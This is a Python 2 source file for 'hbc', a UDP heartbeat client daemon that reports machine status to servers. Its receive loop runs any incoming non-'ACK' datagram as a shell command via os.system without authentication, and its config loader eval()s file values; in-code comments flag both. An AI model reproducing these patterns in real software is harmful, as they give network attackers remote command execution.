#!/usr/bin/env python
# $Id: hbc,v 1.9 2012/03/29 02:08:36 andreas Exp $

# Required packages on Linux:
#	python-filelock 
#	python-daemon, version 1.61 or newer
# on *BSD:
#	py27-lockfile 
#	py27-daemon
# or run:  sudo easy_install-2.7 lockfile daemon
import sys
import time
import socket
import os
import signal
import getopt
import string
import select
import errno
import traceback
import lockfile 
import daemon
try:
	import daemon.pidfile
except:
	print "need version 2.1 or higer of python-daemon"
	sys.exit(1)
import syslog


# Default UDP port of the heartbeat server (initial value of hb_port).
PORT = 50003
# Default number of seconds between two heartbeats (initial value of interval).
INTERVAL = 10
# Pid/lock file used when running as a daemon (-d).
PIDFILE = '/tmp/hbc.pid'
# When True, extra diagnostics are printed to stdout.
DBG = False

# Shared UDP socket; created lazily by socksend()/process().
sock = None
# Main-loop flag; cleanup() sets it to False to stop process().
up = True
# Number of "ACK" datagrams received by process().
ackcount = 0

class NullDevice:
    """File-like sink: anything written to it is thrown away."""

    def write(self, s):
        """Accept *s* and discard it; always returns None."""
        return None


def syslogtrace(note):
	"""Send the traceback of the current exception to syslog.

	note -- short tag naming the place that failed; it starts the report.

	The report is split on newlines and every piece is logged as its own
	syslog entry prefixed with '  tb: '.
	"""
	trace_text = traceback.format_exc()
	report = '%s hbc died: \n%s' % (note, trace_text)
	for entry in report.split('\n'):
		syslog.syslog('  tb: %s' % entry)


def getsock(host):
	"""Create a UDP socket whose address family matches *host*.

	host -- name or address of a heartbeat server.  It is resolved with
	        getaddrinfo() only to learn whether it is IPv4 or IPv6.

	Returns an unconnected SOCK_DGRAM socket with SO_REUSEADDR enabled, or
	None when the name cannot be resolved.  Exits the program with status 1
	if the first resolved address is neither IPv4 nor IPv6.
	"""
	try:
		# The port (50001) is only a placeholder for the lookup; the real
		# destination port is given to sendto() later.
		r = socket.getaddrinfo(host, 50001, 0, 0, socket.IPPROTO_UDP)
	except socket.gaierror:
		logm = '%s hbc died: \n%s' % ('getsock', traceback.format_exc())
		if DBG: print(logm)
		return None

	# Compare against the platform's own constants instead of hard-coded
	# numbers (AF_INET6 is 10 on Linux, 28 on FreeBSD, 30 on Darwin).
	af_type = r[0][0]
	if af_type not in (socket.AF_INET, socket.AF_INET6):
		print("dont know this net type:  %s" % r[0][0])
		sys.exit(1)
	if verbose:
		syslog.syslog("socktype: %s" % af_type)

	sock = socket.socket(af_type, socket.SOCK_DGRAM)
	sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	if verbose: syslog.syslog("get socket %s" % sock)

	return sock


def socksend(msg, tohost):
	"""Send *msg* as a single UDP datagram to *tohost*.

	msg    -- payload string.
	tohost -- (host, port) tuple passed to sendto().

	The module-level socket is created on first use through getsock(),
	using the host part of *tohost*.
	"""
	global sock

	if sock is None:
		target_host = tohost[0]
		sock = getsock(target_host)
	if DBG:
		print("socksend: sending msg=%s on socket=%s" % (msg, sock))
	sock.sendto(msg, tohost)
	if verbose:
		syslog.syslog("msg %s sent" % msg)


def process():
	"""Run the heartbeat loop until the global `up` flag is cleared.

	Every `interval` seconds a heartbeat datagram
	("interval=..;name=..;time=..;acks=..") is sent to each host in
	hb_hosts.  Between heartbeats the socket is watched with select():
	an incoming "ACK" increments ackcount, any other payload is handed to
	os.system().

	Returns when `up` becomes False or when select() fails.
	"""
	global up, sock, ackcount

	if sock is None:
		# The original referenced `tohost`, which does not exist in this
		# scope (NameError); use the first configured server instead.
		sock = getsock(hb_hosts[0])

	ackcount = 0
	lastT = time.time()
	while up:
		# Time left until the next heartbeat is due.
		sleep = (lastT + interval) - time.time()
		if verbose: syslog.syslog("sleep %s" % sleep)
		if sleep > 0:
			try:
				r = select.select([sock.fileno()], [], [], sleep)
			except:
				# Deliberately bare: a signal that interrupts select()
				# (including one whose handler raises SystemExit) ends
				# the loop here.  Only log when it was not a requested
				# shutdown (cleanup() clears `up`).
				if up:
					syslogtrace('select')
				break
			if verbose: syslog.syslog("r is %s" % str(r))
			if sock.fileno() in r[0]:
				data = sock.recvfrom(1024)[0]
				if data == "ACK":
					ackcount += 1
				else:
					# SECURITY: the datagram content is executed as a
					# shell command without any authentication of the
					# sender.  Anyone able to send UDP to this socket
					# can run commands as the daemon's user.
					try:
						os.system(data)
					except Exception:
						syslogtrace('System')
				# Go back to waiting; the heartbeat is not due yet.
				continue
		lastT = time.time()
		for hb_host in hb_hosts:
			try:
				msg = "interval=%s;name=%s;time=%s;acks=%s" % (interval, iam, time.time(), ackcount)
				if verbose: syslog.syslog("sock.send('%s', (%s, %s))" % (msg, hb_host, hb_port))
				socksend(msg, (hb_host, hb_port))
			except Exception:
				# Best effort: a host that cannot be reached now is tried
				# again at the next interval.  SystemExit raised by a
				# terminate signal is no longer swallowed here.
				logm = '%s hbc died: \n%s' % ('socksend', traceback.format_exc())
				if DBG: print(logm)
	

def cleanup(a, b):
	"""Stop the heartbeat loop and tell every server we are shutting down.

	a, b -- signal number and stack frame when installed as a signal
	        handler (also called directly as cleanup(0, None)); they are
	        only written to syslog.

	Clears the global `up` flag, sends "shutdown=1;name=..;acks=.." to each
	host in hb_hosts, waits one second and closes the shared socket.
	"""
	global up, sock, ackcount
	up = False
	syslog.syslog('exit a=%s b=%s' % (str(a), str(b)))
	msg = "shutdown=1;name=%s;acks=%s" % (iam, ackcount)
	for hb_host in hb_hosts:
		if verbose: syslog.syslog("hbc: sock.send('%s', (%s, %s))" % (msg, hb_host, hb_port))
		try:
			socksend(msg, (hb_host, hb_port))
		except Exception:
			# One unreachable server must not keep the others from being
			# notified, nor the socket from being closed below.
			syslogtrace('cleanup')
	time.sleep(1)
	if sock is not None:
		sock.close()


def parse_options(argv):
	"""Parse the hbc command line.

	argv -- argument list without the program name (i.e. sys.argv[1:]).

	Returns a dict with the keys 'optlist', 'args', 'msgonly', 'helpflag',
	'verbose', 'fdaemon', 'msgboot' and 'configfile'.  'configfile' is None
	unless -c was given.  An unknown option or a missing option argument
	sets 'helpflag' and leaves 'optlist' and 'args' empty.
	"""
	res = {
		'optlist': [],
		'args': [],
		'msgonly': False,
		'helpflag': False,
		'verbose': False,
		'fdaemon': False,
		'msgboot': [],
		'configfile': None,
	}
	try:
		res['optlist'], res['args'] = getopt.getopt(argv, 'bc:dhm:v')
	except getopt.GetoptError:
		res['helpflag'] = True

	for o, a in res['optlist']:
		if o == '-b':
			res['msgboot'].append("boot=1")
		elif o == '-c':
			res['configfile'] = a
		elif o == '-d':
			res['fdaemon'] = True
		elif o == '-h':
			res['helpflag'] = True
		elif o == '-m':
			res['msgboot'].append("service=%s" % "service")
			# ';' separates the fields of the wire message, so it must not
			# appear inside the text.  str.replace() returns a new string;
			# the original code discarded that result.
			a = a.replace(';', ':')
			res['msgboot'].append("msg=%s" % a)
			res['msgonly'] = True
		elif o == '-v':
			res['verbose'] = True
	return res


# HOME may be missing from the environment (e.g. when started at boot);
# fall back to the password database instead of dying with KeyError.
if 'HOME' in os.environ:
	home = os.environ['HOME']
else:
	home = os.path.expanduser('~')

_opts = parse_options(sys.argv[1:])
msgonly = _opts['msgonly']
helpflag = _opts['helpflag']
verbose = _opts['verbose']
fdaemon = _opts['fdaemon']
optlist = _opts['optlist']
args = _opts['args']
msgboot = _opts['msgboot']
if _opts['configfile'] is None:
	configfile = "%s/.hbrc" % home
else:
	configfile = _opts['configfile']


if helpflag:
	# Usage text, one entry per output line; an empty entry is a blank line.
	usage_lines = (
		"hbc HeartBeatClient",
		"usage: hbc [-bdhv] [-c configfile] [-m msg][host1 [..]]",
		"",
		"	-b	indicate machine boot",
		"	-c configfile",
		"	-d daemonize",
		"	-h this help",
		"	-m send a message",
		"	-v verbose",
		"",
		" config file can contain ",
		"hb_hosts=('host1', 'host2', ..._",
		"hb_port=50003",
		"interval=20",
		"logfile=...",
		"logfmt={|test|msg}",
		"grace=SECONDS",
		"reportstrict={True|False}",
		"",
	)
	for usage_line in usage_lines:
		print(usage_line)

	# Showing the help always ends the program with status 1.
	sys.exit(1)

#
# set defaults

hb_port = PORT
interval = INTERVAL
hb_hosts = []
iam = socket.gethostname()

# The config file is optional: when it cannot be opened the defaults above
# (and the hosts given on the command line) are used.
try:
	f = open(configfile, "r")
	if verbose: print("notice: using config file %s" % configfile)
except IOError:
	if verbose: print("warning: running without config file: %s" % configfile)
	f = None

if f:
	try:
		for l in f:
			# Strip only the line terminator; the original `l[:-1]` also
			# chopped the last character of a final line that had no
			# trailing newline.  partition() keeps any '=' inside the value.
			key, sep, value = l.rstrip('\r\n').partition('=')
			if not sep:
				# Not a key=value line (blank line, comment, ...).
				continue
			key = key.strip()
			# SECURITY: values are evaluated as Python expressions, so the
			# config file can execute arbitrary code.  It must only be
			# writable by the user running hbc.
			if key == 'hb_hosts':
				hb_hosts = eval(value)
				if verbose:
					print("notice:  cfg hb_hosts: %s" % hb_hosts)
			elif key == 'interval':
				interval = eval(value)
			elif key == 'hb_port':
				hb_port = eval(value)
			elif key == 'name':
				iam = eval(value)
				if verbose: print("name set to %s" % iam)
	finally:
		# Close the file even when a value fails to evaluate.
		f.close()

# Hosts named on the command line take precedence over the config file.
if args:
	hb_hosts = args

# Without at least one heartbeat server there is nothing to do.
if not len(hb_hosts):
	print("no hb server specified")
	sys.exit(1)



# Summary of the effective settings.
if verbose:
	print("notice: hb_hosts: %s" % str(hb_hosts))
	print("notice: hb_port: %s" % hb_port)
	print("notice: interval: %s" % interval)
	print("notice: iam: %s" % iam)

# A plain start (no -m) announces the heartbeat interval to the servers.
if not msgonly:
	msgboot.append("interval=%s" % interval)

# Send the initial message (boot notice, -m message and/or interval) to all
# servers, retrying every 10 seconds until every send succeeded.
if len(msgboot) > 0:
	if DBG: print("on boot")
	msgboot.append("name=%s" % iam)
	msgboot.append("time=%s" % time.time())
	msgboot.append("acks=0")
	msg = ";".join(msgboot)
	while 1:
		fail = 0
		for hb_host in hb_hosts:
			try:
				if DBG: print("sock.send('%s', (%s, %s))" % (msg, hb_host, hb_port))
				socksend(msg, (hb_host, hb_port))
			except Exception:
				# Only real errors trigger a retry.  A bare `except:` here
				# also swallowed sys.exit() from getsock() and Ctrl-C,
				# which turned this into an endless loop.
				logm = '%s hbc died: \n%s' % ('socksend2', traceback.format_exc())
				if DBG: print(logm)
				fail = 1
		if fail:
			time.sleep(10)
		else:
			break

if verbose: print("msgboot done msgonly=%s" % msgonly)
# With -m the program only delivers the message and stops here.
if msgonly:
	sys.exit(0)


#
# Daemon mode (-d): make sure no other instance is running, detach, and run
# the heartbeat loop.
syslog.openlog(logoption=syslog.LOG_PID, facility=syslog.LOG_DAEMON)
if fdaemon:

	pidfile = daemon.pidfile.TimeoutPIDLockFile(PIDFILE, acquire_timeout=-1)
	try:
		opid = pidfile.read_pid()
	except Exception:
		opid = None
	if verbose: print("opid %s" % opid)

	if opid:
		# Signal 0 delivers nothing; it only checks whether the pid exists.
		try:
			os.kill(opid, 0)
			is_running = True
		except OSError as e:
			# EPERM means the process exists but belongs to another user:
			# it is alive and its pid file must not be removed.  Any other
			# error (normally ESRCH) means the pid is gone.
			is_running = (e.errno == errno.EPERM)
		except Exception:
			# e.g. a pid value the kernel interface cannot represent.
			is_running = False
		if verbose: print("is_running  %s" % is_running)
		if is_running:
			print("process still alive %s" % opid)
			sys.exit(1)
		print("warning: stale pid file removed")
		os.unlink(PIDFILE)

	print("daemoinizing... %s" % os.getpid())
	context = daemon.DaemonContext(
		working_directory='/tmp',
		umask=0o002,
		pidfile=pidfile,
		initgroups=False,
		)

	context.signal_map = {
		signal.SIGTERM: cleanup,
		signal.SIGHUP: 'terminate',
#		signal.SIGUSR1: reload_program_config,
		}

	# Keep the already opened UDP socket across the daemonization, which
	# otherwise closes all open file descriptors.
	context.files_preserve = [sock, sock.fileno()]
	with context:
		syslog.syslog('starting heartbeat to %s' %  ','.join(hb_hosts))
		up = True
		try:
			process()
		except:
			# Deliberately bare: whatever ends the loop abnormally
			# (including SystemExit raised by the 'terminate' handler)
			# is logged and the servers get a shutdown notice.
			syslogtrace('process')
			cleanup(0, None)

